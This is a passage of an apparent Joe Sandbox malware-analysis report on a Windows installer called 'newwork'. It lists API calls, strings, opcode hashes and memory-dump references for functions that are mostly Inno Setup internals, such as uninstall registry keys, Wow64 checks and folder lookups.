                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileFindFirstLast
                                                                                • String ID:
                                                                                • API String ID: 873889042-0
                                                                                • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstanceVersion
                                                                                • String ID:
                                                                                • API String ID: 1462612201-0
                                                                                • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                Control-flow Graph (graph image omitted; basic blocks are marked Executed / Not Executed in the original report)
                                                                                APIs
                                                                                  • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                  • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close
                                                                                • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                • API String ID: 3391052094-3342197833
                                                                                • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                Control-flow Graph (graph image omitted; basic blocks are marked Executed / Not Executed in the original report)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                • API String ID: 2230631259-2623177817
                                                                                • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                Control-flow Graph (rendered graph for the function at 00468D88; legend: Executed / Not Executed)
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                Strings
                                                                                • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                • Inno Setup: App Path, xrefs: 00468E4A
                                                                                • Inno Setup: No Icons, xrefs: 00468E73
                                                                                • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                • %s\%s_is1, xrefs: 00468E05
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1093091907
                                                                                • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                  • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                  • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                  • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                • API String ID: 3771764029-544719455
                                                                                • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                Control-flow Graph (rendered graph for the function at 00423874; legend: Executed / Not Executed)
                                                                                APIs
                                                                                  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                • String ID: |6B
                                                                                • API String ID: 183575631-3009739247
                                                                                • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                Control-flow Graph (rendered graph for the function at 0047CE78; legend: Executed / Not Executed)
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(73BD0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                • API String ID: 190572456-1343262939
                                                                                • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                Control-flow Graph (rendered graph for the function at 0040631C; legend: Executed / Not Executed)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID: 3A$yA
                                                                                • API String ID: 3887896539-3278460822
                                                                                • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                Control-flow Graph (rendered graph for the function at 00467180; legend: Executed / Not Executed)
                                                                                APIs
                                                                                • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                  • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                  • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
